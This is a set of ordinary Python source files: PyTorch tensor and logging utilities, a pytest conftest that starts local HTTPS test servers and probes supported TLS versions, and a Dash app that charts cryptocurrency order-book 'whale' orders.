return {k: to_list(v) for k, v in item.items()}
elif np.isscalar(item):
return item
else:
raise TypeError("not support item type: {}".format(type(item)))
def tensor_to_list(item):
r"""
Overview:
Transform `torch.Tensor` to `list`, keep other data types unchanged
Arguments:
- item (:obj:`Any`): the item to be transformed
Returns:
- item (:obj:`list`): the list after transformation
.. note::
Now supports item type: :obj:`torch.Tensor`, :obj:`dict`, :obj:`list`, :obj:`tuple` and :obj:`None`
"""
if item is None:
return item
elif isinstance(item, torch.Tensor):
return item.tolist()
elif isinstance(item, list) or isinstance(item, tuple):
return [tensor_to_list(t) for t in item]
elif isinstance(item, dict):
return {k: tensor_to_list(v) for k, v in item.items()}
elif np.isscalar(item):
return item
else:
raise TypeError("not support item type: {}".format(type(item)))
def same_shape(data: list) -> bool:
r"""
Overview:
Judge whether all data elements in a list have the same shape.
Arguments:
- data (:obj:`list`): the list of data
Returns:
- same (:obj:`bool`): whether the list of data all have the same shape
"""
assert (isinstance(data, list))
shapes = [t.shape for t in data]
return len(set(shapes)) == 1
class LogDict(dict):
'''
Overview:
        Derived from ``dict``; transforms ``torch.Tensor`` values to ``list`` for convenient logging.
'''
def _transform(self, data):
if isinstance(data, torch.Tensor):
new_data = data.tolist()
else:
new_data = data
return new_data
def __setitem__(self, key, value):
new_value = self._transform(value)
super().__setitem__(key, new_value)
def update(self, data):
for k, v in data.items():
self.__setitem__(k, v)
def build_log_buffer():
r"""
Overview:
        Build a log buffer, a subclass of dict, which can transform the input data into log format.
Returns:
- log_buffer (:obj:`LogDict`): Log buffer dict
"""
return LogDict()
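# Illustrative sketch of the log buffer: tensor values are converted to plain
# lists on assignment, which keeps logged data serializable. Not called here.
def _log_buffer_example() -> None:
    buf = build_log_buffer()
    buf.update({'loss': torch.tensor([0.5, 0.25])})
    assert buf['loss'] == [0.5, 0.25]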
class CudaFetcher(object):
"""
Overview:
Fetch data from source, and transfer it to specified device.
Interfaces:
run, close
"""
def __init__(self, data_source: Iterable, device: str, queue_size: int = 4, sleep: float = 0.1) -> None:
self._source = data_source
self._queue = Queue(maxsize=queue_size)
self._stream = torch.cuda.Stream()
self._producer_thread = Thread(target=self._producer, args=(), name='cuda_fetcher_producer')
self._sleep = sleep
self._device = device
def __next__(self) -> Any:
return self._queue.get()
def run(self) -> None:
"""
Overview:
Start `producer` thread: Keep fetching data from source,
change the device, and put into `queue` for request.
"""
self._end_flag = False
self._producer_thread.start()
def close(self) -> None:
"""
Overview:
Stop `producer` thread by setting `end_flag` to `True`.
"""
self._end_flag = True
def _producer(self) -> None:
with torch.cuda.stream(self._stream):
while not self._end_flag:
if self._queue.full():
time.sleep(self._sleep)
else:
data = next(self._source)
data = to_device(data, self._device)
self._queue.put(data)
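# Illustrative sketch of CudaFetcher usage; requires an available CUDA device
# and uses a made-up endless batch source. Not called anywhere in the module.
def _cuda_fetcher_example() -> None:
    source = iter(lambda: {'obs': torch.randn(8, 4)}, None)  # never-ending batches
    fetcher = CudaFetcher(source, device='cuda', queue_size=2)
    fetcher.run()
    batch = next(fetcher)  # batch['obs'] now lives on the GPU
    assert batch['obs'].device.type == 'cuda'
    fetcher.close()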
def get_tensor_data(data: Any) -> Any:
"""
Overview:
Get pure tensor data from the given data(without disturbing grad computation graph)
"""
if isinstance(data, torch.Tensor):
return data.data.clone()
elif data is None:
return None
elif isinstance(data, Sequence):
return [get_tensor_data(d) for d in data]
elif isinstance(data, dict):
return {k: get_tensor_data(v) for k, v in data.items()}
else:
raise TypeError("not support type in get_tensor_data: {}".format(type(data)))
|
conftest.py
|
import collections
import contextlib
import platform
import socket
import ssl
import sys
import threading
import pytest
import trustme
from tornado import ioloop, web
from dummyserver.handlers import TestingApp
from dummyserver.proxy import ProxyHandler
from dummyserver.server import HAS_IPV6, run_tornado_app
from dummyserver.testcase import HTTPSDummyServerTestCase
from urllib3.util import ssl_
from .tz_stub import stub_timezone_ctx
# The Python 3.8+ default loop on Windows breaks Tornado
@pytest.fixture(scope="session", autouse=True)
def configure_windows_event_loop():
if sys.version_info >= (3, 8) and platform.system() == "Windows":
import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
ServerConfig = collections.namedtuple("ServerConfig", ["host", "port", "ca_certs"])
def _write_cert_to_dir(cert, tmpdir, file_prefix="server"):
cert_path = str(tmpdir / ("%s.pem" % file_prefix))
key_path = str(tmpdir / ("%s.key" % file_prefix))
cert.private_key_pem.write_to_path(key_path)
cert.cert_chain_pems[0].write_to_path(cert_path)
certs = {"keyfile": key_path, "certfile": cert_path}
return certs
@contextlib.contextmanager
def run_server_in_thread(scheme, host, tmpdir, ca, server_cert):
ca_cert_path = str(tmpdir / "ca.pem")
ca.cert_pem.write_to_path(ca_cert_path)
server_certs = _write_cert_to_dir(server_cert, tmpdir)
io_loop = ioloop.IOLoop.current()
app = web.Application([(r".*", TestingApp)])
server, port = run_tornado_app(app, io_loop, server_certs, scheme, host)
server_thread = threading.Thread(target=io_loop.start)
server_thread.start()
yield ServerConfig(host, port, ca_cert_path)
io_loop.add_callback(server.stop)
io_loop.add_callback(io_loop.stop)
server_thread.join()
@contextlib.contextmanager
def run_server_and_proxy_in_thread(
proxy_scheme, proxy_host, tmpdir, ca, proxy_cert, server_cert
):
ca_cert_path = str(tmpdir / "ca.pem")
ca.cert_pem.write_to_path(ca_cert_path)
server_certs = _write_cert_to_dir(server_cert, tmpdir)
proxy_certs = _write_cert_to_dir(proxy_cert, tmpdir, "proxy")
io_loop = ioloop.IOLoop.current()
server = web.Application([(r".*", TestingApp)])
server, port = run_tornado_app(server, io_loop, server_certs, "https", "localhost")
server_config = ServerConfig("localhost", port, ca_cert_path)
proxy = web.Application([(r".*", ProxyHandler)])
proxy_app, proxy_port = run_tornado_app(
proxy, io_loop, proxy_certs, proxy_scheme, proxy_host
)
proxy_config = ServerConfig(proxy_host, proxy_port, ca_cert_path)
server_thread = threading.Thread(target=io_loop.start)
server_thread.start()
yield (proxy_config, server_config)
io_loop.add_callback(server.stop)
io_loop.add_callback(proxy_app.stop)
io_loop.add_callback(io_loop.stop)
server_thread.join()
@pytest.fixture
def no_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only common name, no subject alternative names
server_cert = ca.issue_cert(common_name=u"localhost")
with run_server_in_thread("https", "localhost", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def no_san_proxy(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only common name, no subject alternative names
proxy_cert = ca.issue_cert(common_name=u"localhost")
server_cert = ca.issue_cert(u"localhost")
with run_server_and_proxy_in_thread(
"https", "localhost", tmpdir, ca, proxy_cert, server_cert
) as cfg:
yield cfg
@pytest.fixture
def no_localhost_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# non localhost common name
server_cert = ca.issue_cert(u"example.com")
with run_server_in_thread("https", "localhost", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv4_san_proxy(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
proxy_cert = ca.issue_cert(u"127.0.0.1")
server_cert = ca.issue_cert(u"localhost")
with run_server_and_proxy_in_thread(
"https", "127.0.0.1", tmpdir, ca, proxy_cert, server_cert
) as cfg:
yield cfg
@pytest.fixture
def ipv6_san_proxy(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP addresses in Subject Alternative Name
proxy_cert = ca.issue_cert(u"::1")
server_cert = ca.issue_cert(u"localhost")
with run_server_and_proxy_in_thread(
"https", "::1", tmpdir, ca, proxy_cert, server_cert
) as cfg:
yield cfg
@pytest.fixture
def ipv4_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert(u"127.0.0.1")
with run_server_in_thread("https", "127.0.0.1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv6_addr_server(tmp_path_factory):
if not HAS_IPV6:
pytest.skip("Only runs on IPv6 systems")
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Common Name
server_cert = ca.issue_cert(common_name=u"::1")
with run_server_in_thread("https", "::1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv6_san_server(tmp_path_factory):
if not HAS_IPV6:
pytest.skip("Only runs on IPv6 systems")
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert(u"::1")
with run_server_in_thread("https", "::1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.yield_fixture
def stub_timezone(request):
"""
A pytest fixture that runs the test with a stub timezone.
"""
with stub_timezone_ctx(request.param):
yield
@pytest.fixture(scope="session")
def supported_tls_versions():
# We have to create an actual TLS connection
# to test if the TLS version is not disabled by
# OpenSSL config. Ubuntu 20.04 specifically
# disables TLSv1 and TLSv1.1.
tls_versions = set()
_server = HTTPSDummyServerTestCase()
_server._start_server()
for _ssl_version_name in (
"PROTOCOL_TLSv1",
"PROTOCOL_TLSv1_1",
"PROTOCOL_TLSv1_2",
"PROTOCOL_TLS",
):
_ssl_version = getattr(ssl, _ssl_version_name, 0)
if _ssl_version == 0:
continue
_sock = socket.create_connection((_server.host, _server.port))
try:
_sock = ssl_.ssl_wrap_socket(
_sock, cert_reqs=ssl.CERT_NONE, ssl_version=_ssl_version
)
except ssl.SSLError:
pass
else:
tls_versions.add(_sock.version())
_sock.close()
_server._stop_server()
return tls_versions
@pytest.fixture(scope="function")
def requires_tlsv1(supported_tls_versions):
"""Test requires TLSv1 available"""
if not hasattr(ssl, "PROTOCOL_TLSv1") or "TLSv1" not in supported_tls_versions:
pytest.skip("Test requires TLSv1")
@pytest.fixture(scope="function")
def requires_tlsv1_1(supported_tls_versions):
"""Test requires TLSv1.1 available"""
if not hasattr(ssl, "PROTOCOL_TLSv1_1") or "TLSv1.1" not in supported_tls_versions:
pytest.skip("Test requires TLSv1.1")
@pytest.fixture(scope="function")
def requires_tlsv1_2(supported_tls_versions):
"""Test requires TLSv1.2 available"""
if not hasattr(ssl, "PROTOCOL_TLSv1_2") or "TLSv1.2" not in supported_tls_versions:
pytest.skip("Test requires TLSv1.2")
@pytest.fixture(scope="function")
def requires_tlsv1_3(supported_tls_versions):
"""Test requires TLSv1.3 available"""
if (
not getattr(ssl, "HAS_TLSv1_3", False)
or "TLSv1.3" not in supported_tls_versions
):
pytest.skip("Test requires TLSv1.3")
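# Minimal usage sketch: a test module could combine the fixtures above along
# these lines; the urllib3 calls and assertion are illustrative only.
#
#     def test_ipv4_san_request(ipv4_san_server, requires_tlsv1_2):
#         import urllib3
#         with urllib3.HTTPSConnectionPool(
#             ipv4_san_server.host, ipv4_san_server.port,
#             ca_certs=ipv4_san_server.ca_certs,
#         ) as pool:
#             r = pool.request("GET", "/")
#             assert r.status == 200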
|
app.py
|
# modules
# dash-related libraries
import dash
from dash.dependencies import Output, Event
from math import log10, floor, isnan
from datetime import datetime
from random import randint
import dash_core_components as dcc
import dash_html_components as html
import colorama
import sys
import getopt
# non-dash-related libraries
import plotly.graph_objs as go
import pandas as pd
import cbpro
import numpy as np
# modules added by contributors
import time
import threading
from queue import Queue
# custom library
from gdax_book import GDaxBook
colorama.init()
# creating variables to facilitate later parameterization
debugLevel = 3
debugLevels = ["Special Debug","Debug","Info","Warnings","Errors"]
debugColors = ['\033[34m','\033[90m','\033[32m','\033[33;1m','\033[31m']
serverPort = 8050
clientRefresh = 1
desiredPairRefresh = 10000  # (in ms) Lower values refresh pairs faster; higher values reduce CPU load.
js_extern = "https://cdn.rawgit.com/pmaji/crypto-whale-watching-app/master/main.js"
noDouble = True  # if activated, an order that is part of a ladder is drawn only once (as a bubble, not as a ladder)
SYMBOLS = {"USD": "$", "BTC": "₿", "EUR": "€", "GBP": "£"} # used for the tooltip
SIGNIFICANT = {"USD": 2, "BTC": 5, "EUR": 2, "GBP": 2} # used for rounding
TBL_PRICE = 'price'
TBL_VOLUME = 'volume'
tables = {}
depth_ask = {}
depth_bid = {}
marketPrice = {}
prepared = {}
shape_bid = {}
shape_ask = {}
timeStampsGet = {} # For storing timestamp of Data Refresh
timeStamps = {} # For storing timestamp from calc start at calc end
sendCache = {}
first_prepare = True
first_pull = True
overallNewData = False
class Exchange:
ticker = []
client = ""
def __init__(self, pName, pTicker, pStamp):
self.name = pName
self.ticker.extend(pTicker)
self.millis = pStamp
class Pair:
# Class to store a pair with its respective threads
def __init__(self, pExchange, pTicker):
self.ob_Inst = {}
self.threadWebsocket = {}
self.threadPrepare = {}
self.threadRecalc = {}
self.Dataprepared = False
self.webSocketKill = 1
self.lastStamp = 0
self.usedStamp = 0
self.newData = False
self.name = pExchange + " " + pTicker
self.ticker = pTicker
self.lastUpdate = "0"
self.exchange = pExchange
self.prepare = False
self.websocket = False
self.combined = pExchange + pTicker
PAIRS = [] # Array containing all pairs
E_GDAX = Exchange("GDAX", [
"ETH-USD", "ETH-EUR", "ETH-BTC",
"BTC-USD", "BTC-EUR", "BTC-GBP",
"LTC-USD", "LTC-EUR", "LTC-BTC",
"BCH-USD", "BCH-EUR", "BCH-BTC"], 0)
for ticker in E_GDAX.ticker:
cObj = Pair(E_GDAX.name, ticker)
PAIRS.append(cObj)
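# Illustrative sketch: registering an additional market would follow the same
# pattern as the loop above; the ticker below is hypothetical and must be
# supported by the exchange's websocket feed.
#
#     extra_pair = Pair(E_GDAX.name, "ETH-GBP")
#     PAIRS.append(extra_pair)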
# creates a cache to speed up load time and facilitate refreshes
def get_data_cache(ticker):
return tables[ticker]
def get_All_data():
return prepared
def getSendCache():
return sendCache
def calc_data(pair, range=0.05, maxSize=32, minVolumePerc=0.01, ob_points=60):
global tables, timeStamps, shape_bid, shape_ask, E_GDAX, marketPrice, timeStampsGet
# function to get data from GDAX to be referenced in our call-back later
# ticker a string to particular Ticker (e.g. ETH-USD)
# range is the deviation visible from current price
# maxSize is a parameter to limit the maximum size of the bubbles in the viz
# minVolumePerc is used to set the minimum volume needed for a price-point to be included in the viz
ticker = pair.ticker
exchange = pair.exchange
combined = exchange + ticker
if pair.exchange == E_GDAX.name:
# order_book = gdax.PublicClient().get_product_order_book(ticker, level=3)
order_book = pair.ob_Inst.get_current_book()
pair.usedStamp = getStamp()
ask_tbl = pd.DataFrame(data=order_book['asks'], columns=[
TBL_PRICE, TBL_VOLUME, 'address'])
bid_tbl = pd.DataFrame(data=order_book['bids'], columns=[
TBL_PRICE, TBL_VOLUME, 'address'])
timeStampsGet[pair.combined] = datetime.now().strftime("%H:%M:%S") # save timestamp at data pull time
# Determine what currencies we're working with to make the tool tip more dynamic.
currency = ticker.split("-")[0]
base_currency = ticker.split("-")[1]
sig_use = SIGNIFICANT.get(base_currency.upper(), 2)
symbol = SYMBOLS.get(base_currency.upper(), "")
try:
first_ask = float(ask_tbl.iloc[1, 0])
except (IndexError):
log(4,"Empty data for " + combined + " Will wait 3s")
time.sleep(3)
return False
# prepare Price
ask_tbl[TBL_PRICE] = pd.to_numeric(ask_tbl[TBL_PRICE])
bid_tbl[TBL_PRICE] = pd.to_numeric(bid_tbl[TBL_PRICE])
# data from websocket are not sorted yet
ask_tbl = ask_tbl.sort_values(by=TBL_PRICE, ascending=True)
bid_tbl = bid_tbl.sort_values(by=TBL_PRICE, ascending=False)
# get first on each side
first_ask = float(ask_tbl.iloc[1, 0])
# get perc for ask/ bid
perc_above_first_ask = ((1.0 + range) * first_ask)
perc_above_first_bid = ((1.0 - range) * first_ask)
# limits the size of the table so that we only look at orders 5% above and under market price
ask_tbl = ask_tbl[(ask_tbl[TBL_PRICE] <= perc_above_first_ask)]
bid_tbl = bid_tbl[(bid_tbl[TBL_PRICE] >= perc_above_first_bid)]
# changing this position after first filter makes calc faster
bid_tbl[TBL_VOLUME] = pd.to_numeric(bid_tbl[TBL_VOLUME])
ask_tbl[TBL_VOLUME] = pd.to_numeric(ask_tbl[TBL_VOLUME])
    # prepare everything for the depth chart
ob_step = (perc_above_first_ask - first_ask) / ob_points
ob_ask = pd.DataFrame(columns=[TBL_PRICE, TBL_VOLUME, 'address', 'text'])
ob_bid = pd.DataFrame(columns=[TBL_PRICE, TBL_VOLUME, 'address', 'text'])
    # The following builds 'ob_ask'/'ob_bid', which contain the summed volume and address count from the current price out to each target price
i = 1
last_ask = first_ask
last_bid = first_ask
current_ask_volume = 0
current_bid_volume = 0
current_ask_adresses = 0
current_bid_adresses = 0
while i < ob_points:
# Get Borders for ask/ bid
current_ask_border = first_ask + (i * ob_step)
current_bid_border = first_ask - (i * ob_step)
# Get Volume
current_ask_volume += ask_tbl.loc[
(ask_tbl[TBL_PRICE] >= last_ask) & (ask_tbl[TBL_PRICE] < current_ask_border), TBL_VOLUME].sum()
current_bid_volume += bid_tbl.loc[
(bid_tbl[TBL_PRICE] <= last_bid) & (bid_tbl[TBL_PRICE] > current_bid_border), TBL_VOLUME].sum()
        # Get addresses
current_ask_adresses += ask_tbl.loc[
(ask_tbl[TBL_PRICE] >= last_ask) & (ask_tbl[TBL_PRICE] < current_ask_border), 'address'].count()
current_bid_adresses += bid_tbl.loc[
(bid_tbl[TBL_PRICE] <= last_bid) & (bid_tbl[TBL_PRICE] > current_bid_border), 'address'].count()
# Prepare Text
ask_text = (str(round_sig(current_ask_volume, 3, 0, sig_use)) + currency + " (from " + str(current_ask_adresses) +
" orders) up to " + str(round_sig(current_ask_border, 3, 0, sig_use)) + symbol)
bid_text = (str(round_sig(current_bid_volume, 3, 0, sig_use)) + currency + " (from " + str(current_bid_adresses) +
" orders) down to " + str(round_sig(current_bid_border, 3, 0, sig_use)) + symbol)
# Save Data
ob_ask.loc[i - 1] = [current_ask_border, current_ask_volume, current_ask_adresses, ask_text]
ob_bid.loc[i - 1] = [current_bid_border, current_bid_volume, current_bid_adresses, bid_text]
i += 1
last_ask = current_ask_border
last_bid = current_bid_border
# Get Market Price
try:
mp = round_sig((ask_tbl[TBL_PRICE].iloc[0] +
bid_tbl[TBL_PRICE].iloc[0]) / 2.0, 3, 0, sig_use)
except (IndexError):
log(4,"Empty data for " + combined + " Will wait 3s")
time.sleep(3)
return False
bid_tbl = bid_tbl.iloc[::-1] # flip the bid table so that the merged full_tbl is in logical order
fulltbl = bid_tbl.append(ask_tbl) # append the buy and sell side tables to create one cohesive table
minVolume = fulltbl[TBL_VOLUME].sum() * minVolumePerc # Calc minimum Volume for filtering
fulltbl = fulltbl[
(fulltbl[TBL_VOLUME] >= minVolume)] # limit our view to only orders greater than or equal to the minVolume size
fulltbl['sqrt'] = np.sqrt(fulltbl[
TBL_VOLUME]) # takes the square root of the volume (to be used later on for the purpose of sizing the order bubbles)
final_tbl = fulltbl.groupby([TBL_PRICE])[
[TBL_VOLUME]].sum() # transforms the table for a final time to craft the data view we need for analysis
final_tbl['n_unique_orders'] = fulltbl.groupby(
TBL_PRICE).address.nunique().astype(int)
final_tbl = final_tbl[(final_tbl['n_unique_orders'] <= 20.0)]
final_tbl[TBL_PRICE] = final_tbl.index
final_tbl[TBL_PRICE] = final_tbl[TBL_PRICE].apply(round_sig, args=(3, 0, sig_use))
final_tbl[TBL_VOLUME] = final_tbl[TBL_VOLUME].apply(round_sig, args=(1, 2))
final_tbl['n_unique_orders'] = final_tbl['n_unique_orders'].apply(round_sig, args=(0,))
final_tbl['sqrt'] = np.sqrt(final_tbl[TBL_VOLUME])
final_tbl['total_price'] = (((final_tbl['volume'] * final_tbl['price']).round(2)).apply(lambda x: "{:,}".format(x)))
# The following lines prevent orders from being drawn twice when they form a ladder larger than 1%
if noDouble:
bid_tbl = bid_tbl[(bid_tbl['volume'] < minVolume)]
ask_tbl = ask_tbl[(ask_tbl['volume'] < minVolume)]
bid_tbl['total_price'] = bid_tbl['volume'] * bid_tbl['price']
ask_tbl['total_price'] = ask_tbl['volume'] * ask_tbl['price']
# Get Dataset for Volume Grouping
vol_grp_bid = bid_tbl.groupby([TBL_VOLUME]).agg(
{TBL_PRICE: [np.min, np.max, 'count'], TBL_VOLUME: np.sum, 'total_price': np.sum})
vol_grp_ask = ask_tbl.groupby([TBL_VOLUME]).agg(
{TBL_PRICE: [np.min, np.max, 'count'], TBL_VOLUME: np.sum, 'total_price': np.sum})
# Rename column names for Volume Grouping
vol_grp_bid.columns = ['min_Price', 'max_Price', 'count', TBL_VOLUME, 'total_price']
vol_grp_ask.columns = ['min_Price', 'max_Price', 'count', TBL_VOLUME, 'total_price']
# Filter by minimum volume; keep only groups with more than 1 order (a single order would interfere with its bubble) and fewer than 70 (larger counts are mostly 1 or 0.5 ETH retail orders)
vol_grp_bid = vol_grp_bid[
((vol_grp_bid[TBL_VOLUME] >= minVolume) & (vol_grp_bid['count'] >= 2.0) & (vol_grp_bid['count'] < 70.0))]
vol_grp_ask = vol_grp_ask[
((vol_grp_ask[TBL_VOLUME] >= minVolume) & (vol_grp_ask['count'] >= 2.0) & (vol_grp_ask['count'] < 70.0))]
# Get the size of each order
vol_grp_bid['unique'] = vol_grp_bid.index.get_level_values(TBL_VOLUME)
vol_grp_ask['unique'] = vol_grp_ask.index.get_level_values(TBL_VOLUME)
# Round the size of order
vol_grp_bid['unique'] = vol_grp_bid['unique'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['unique'] = vol_grp_ask['unique'].apply(round_sig, args=(3, 0, sig_use))
# Round the Volume
vol_grp_bid[TBL_VOLUME] = vol_grp_bid[TBL_VOLUME].apply(round_sig, args=(1, 0, sig_use))
vol_grp_ask[TBL_VOLUME] = vol_grp_ask[TBL_VOLUME].apply(round_sig, args=(1, 0, sig_use))
# Round the Min/ Max Price
vol_grp_bid['min_Price'] = vol_grp_bid['min_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['min_Price'] = vol_grp_ask['min_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_bid['max_Price'] = vol_grp_bid['max_Price'].apply(round_sig, args=(3, 0, sig_use))
vol_grp_ask['max_Price'] = vol_grp_ask['max_Price'].apply(round_sig, args=(3, 0, sig_use))
# Round and format the Total Price
vol_grp_bid['total_price'] = (vol_grp_bid['total_price'].round(sig_use).apply(lambda x: "{:,}".format(x)))
vol_grp_ask['total_price'] = (vol_grp_ask['total_price'].round(sig_use).apply(lambda x: "{:,}".format(x)))
# Append individual text to each element
vol_grp_bid['text'] = ("There are " + vol_grp_bid['count'].map(str) + " orders " + vol_grp_bid['unique'].map(
str) + " " + currency +
" each, from " + symbol + vol_grp_bid['min_Price'].map(str) + " to " + symbol +
vol_grp_bid['max_Price'].map(str) + " resulting in a total of " + vol_grp_bid[
TBL_VOLUME].map(str) + " " + currency + " worth " + symbol + vol_grp_bid[
'total_price'].map(str))
vol_grp_ask['text'] = ("There are " + vol_grp_ask['count'].map(str) + " orders " + vol_grp_ask['unique'].map(
str) + " " + currency +
" each, from " + symbol + vol_grp_ask['min_Price'].map(str) + " to " + symbol +
vol_grp_ask['max_Price'].map(str) + " resulting in a total of " + vol_grp_ask[
TBL_VOLUME].map(str) + " " + currency + " worth " + symbol + vol_grp_ask[
'total_price'].map(str))
# Save data global
shape_ask[combined] = vol_grp_ask
shape_bid[combined] = vol_grp_bid
cMaxSize = final_tbl['sqrt'].max() # Fixing Bubble Size
# nifty way of ensuring the size of the bubbles is proportional and reasonable
sizeFactor = maxSize / cMaxSize
final_tbl['sqrt'] = final_tbl['sqrt'] * sizeFactor
# making the tooltip column for our charts
final_tbl['text'] = (
"There is a " + final_tbl[TBL_VOLUME].map(str) + " " + currency + " order for " + symbol + final_tbl[
TBL_PRICE].map(str) + " being offered by " + final_tbl['n_unique_orders'].map(
str) + " unique orders worth " + symbol + final_tbl['total_price'].map(str))
# determine buys / sells relative to last market price; colors price bubbles based on size
# Buys are green, sells are red. Likely whales are drawn brighter, detected via the unique order count.
final_tbl['colorintensity'] = final_tbl['n_unique_orders'].apply(calcColor)
final_tbl.loc[(final_tbl[TBL_PRICE] > mp), 'color'] = \
'rgb(' + final_tbl.loc[(final_tbl[TBL_PRICE] >
mp), 'colorintensity'].map(str) + ',0,0)'
final_tbl.loc[(final_tbl[TBL_PRICE] <= mp), 'color'] = \
'rgb(0,' + final_tbl.loc[(final_tbl[TBL_PRICE]
<= mp), 'colorintensity'].map(str) + ',0)'
timeStamps[combined] = timeStampsGet[combined] # now save timestamp of calc start in timestamp used for title
tables[combined] = final_tbl # save table data
marketPrice[combined] = mp # save market price
depth_ask[combined] = ob_ask
depth_bid[combined] = ob_bid
pair.newData = True
pair.prepare = True # just used for first enabling of send prepare
return True
# begin building the dash itself
app = dash.Dash()
app.scripts.append_script({"external_url": js_extern})
# simple layout that can be improved with better CSS/JS later, but it does the job for now
# static_content_before contains all the info we want in our headers that won't be dynamic (for now)
static_content_before = [
html.H2('CRYPTO WHALE WATCHING APP'),
html.H3(html.A('GitHub Link Here (Consider supporting us by giving a star; request new features via "issues" tab)',
href="https://github.com/pmaji/eth_python_tracker")),
html.P([
"Legend: Bright colored mark = likely WHALE ",
"(high volume price point via 1 unique order, or many identical medium-sized orders in a ladder). ", html.Br(),
"Bubbles get darker as the number of unique orders increases. " , html.Br(),
"Hover over bubbles for more info. Note: volume (x-axis) on log-scale. " , html.Br(),
"Click 'Freeze all' button to halt refresh, "
"and hide/show buttons to pick which currency pairs to display. " , html.Br(),
"Only displays orders >= 1% of the volume of the portion of the order book displayed. ", html.Br(),
"If annotations overlap or bubbles cluster, click 'Freeze all' and then zoom in on the area of interest.", html.Br(),
"See GitHub link above for further details."
])
]
cCache = []
for pair in PAIRS:
ticker = pair.ticker
exchange = pair.exchange
graph = 'live-graph-' + exchange + "-" + ticker
cCache.append(html.Br())
cCache.append(html.Div(id=graph))
static_content_after = dcc.Interval(
id='main-interval-component',
interval=clientRefresh * 1000
)
app.layout = html.Div(id='main_container', children=[
html.Div(static_content_before),
html.Div(id='graphs_Container', children=cCache),
html.Div(static_content_after),
])
def prepare_data(ticker, exchange):
combined = exchange + ticker
data = get_data_cache(combined)
pair.newData = False
base_currency = ticker.split("-")[1]
ob_ask = depth_ask[combined]
ob_bid = depth_bid[combined]
#Get Minimum and Maximum
ladder_Bid_Min = fixNan(shape_bid[combined]['volume'].min())
ladder_Bid_Max = fixNan(shape_bid[combined]['volume'].max(), False)
ladder_Ask_Min = fixNan(shape_ask[combined]['volume'].min())
ladder_Ask_Max = fixNan(shape_ask[combined]['volume'].max(), False)
data_min = fixNan(data[TBL_VOLUME].min())
data_max = fixNan(data[TBL_VOLUME].max(), False)
ob_bid_max = fixNan(ob_bid[TBL_VOLUME].max(), False)
ob_ask_max = fixNan(ob_ask[TBL_VOLUME].max(), False)
symbol = SYMBOLS.get(base_currency.upper(), "")
x_min = min([ladder_Bid_Min, ladder_Ask_Min, data_min])
x_max = max([ladder_Bid_Max, ladder_Ask_Max, data_max, ob_ask_max, ob_bid_max])
max_unique = max([fixNan(shape_bid[combined]['unique'].max(), False),
fixNan(shape_ask[combined]['unique'].max(), False)])
width_factor = 15
if max_unique > 0: width_factor = 15 / max_unique
market_price = marketPrice[combined]
bid_trace = go.Scatter(
x=[], y=[],
text=[],
mode='markers', hoverinfo='text',
marker=dict(opacity=0, color='rgb(0,255,0)'))
ask_trace = go.Scatter(
x=[], y=[],
text=[],
mode='markers', hoverinfo='text',
marker=dict(opacity=0, color='rgb(255,0,0)'))
shape_arr = [dict(
# Line Horizontal
type='line',
x0=x_min * 0.5, y0=market_price,
x1=x_max * 1.5, y1=market_price,
line=dict(color='rgb(0, 0, 0)', width=2, dash='dash')
)]
annot_arr = [dict(
x=log10((x_max*0.9)), y=market_price, xref='x', yref='y',
text=str(market_price) + symbol,
showarrow=True, arrowhead=7, ax=20, ay=0,
bgcolor='rgb(0,0,255)', font={'color': '#ffffff'}
)]
# delete these 10 lines below if we want to move to a JS-based coloring system in the future
shape_arr.append(dict(type='rect',
x0=x_min, y0=market_price,
x1=x_max, y1=market_price * 1.05,
line=dict(color='rgb(255, 0, 0)', width=0.01),
fillcolor='rgba(255, 0, 0, 0.04)'))
shape_arr.append(dict(type='rect',
x0=x_min, y0=market_price,
x1=x_max, y1=market_price * 0.95,
line=dict(color='rgb(0, 255, 0)', width=0.01),
fillcolor='rgba(0, 255, 0, 0.04)'))
for index, row in shape_bid[combined].iterrows():
cWidth = row['unique'] * width_factor
vol = row[TBL_VOLUME]
posY = (row['min_Price'] + row['max_Price']) / 2.0
if cWidth > 15:
cWidth = 15
elif cWidth < 2:
cWidth = 2
shape_arr.append(dict(type='line',
opacity=0.5,
x0=vol, y0=row['min_Price'],
x1=vol, y1=row['max_Price'],
line=dict(color='rgb(0, 255, 0)', width=cWidth)))
bid_trace['x'].append(vol)
bid_trace['y'].append(row['min_Price'])
bid_trace['text'].append(row['text'])
bid_trace['x'].append(vol)
bid_trace['y'].append(posY)
bid_trace['text'].append(row['text'])
bid_trace['x'].append(vol)
bid_trace['y'].append(row['max_Price'])
bid_trace['text'].append(row['text'])
for index, row in shape_ask[combined].iterrows():
cWidth = row['unique'] * width_factor
vol = row[TBL_VOLUME]
posY = (row['min_Price'] + row['max_Price']) / 2.0
if cWidth > 15:
cWidth = 15
elif cWidth < 2:
cWidth = 2
shape_arr.append(dict(type='line',
opacity=0.5,
x0=vol, y0=row['min_Price'],
x1=vol, y1=row['max_Price'],
line=dict(color='rgb(255, 0, 0)', width=cWidth)))
ask_trace['x'].append(vol)
ask_trace['y'].append(row['min_Price'])
ask_trace['text'].append(row['text'])
ask_trace['x'].append(vol)
ask_trace['y'].append(posY)
ask_trace['text'].append(row['text'])
